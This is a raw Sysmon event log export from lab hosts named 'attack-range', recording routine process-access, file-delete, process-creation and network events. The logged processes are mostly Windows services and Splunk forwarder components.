14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:46.986{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B74FA2B773AF8BB282D9977A23A1B3FB,SHA256=548CD185C40F213048E2CBCC28FF111ABC95CD377D175992F0C11E1917FB39E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043786Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:46.276{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F68668773BA7EE51E7C00BC244E5261,SHA256=B43B87A7E92C632CBF9647BEF4DE938396FFBCACCF3C5084DC70A30D0580640B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043801Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1793-629A-0607-000000006002}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043800Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043799Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043798Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043797Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043796Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043795Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043794Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043793Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043792Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043791Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-1793-629A-0607-000000006002}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043790Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.792{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1793-629A-0607-000000006002}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043789Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.793{0A5DF930-1793-629A-0607-000000006002}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000043788Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:47.370{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A98318667D32DD6E131FFBF4A7B216B,SHA256=8086712A8C2C34B57DE4BD900CA6AADFE97476DFD4B570CC20E23D4BCC1651BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:47.221{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=2945F8568A1359250E84AD8C24364A1C,SHA256=EF0C71DB05B117B6D739AC4D98A257707250E7EB4A0F752F8347C311A85BB7B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043787Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:44.637{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043817Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.901{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B40C027A4835C76E38CB205D25A543CC,SHA256=234E433D5BD4DD04ED3274E049DFE1EF13CA49072BDE30058E68BDCF4191EAD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043816Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.620{0A5DF930-1794-629A-0707-000000006002}30442776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043815Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B188299D59E0F60BA7ABE3F62EDCCB94,SHA256=2F4CB90F9ED78A0213ECB6BDC350D9558DA82F605E733A87FF7F0F8B5CD8D487,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043814Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1794-629A-0707-000000006002}3044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043813Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043812Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043811Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043810Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043809Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:48.464{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 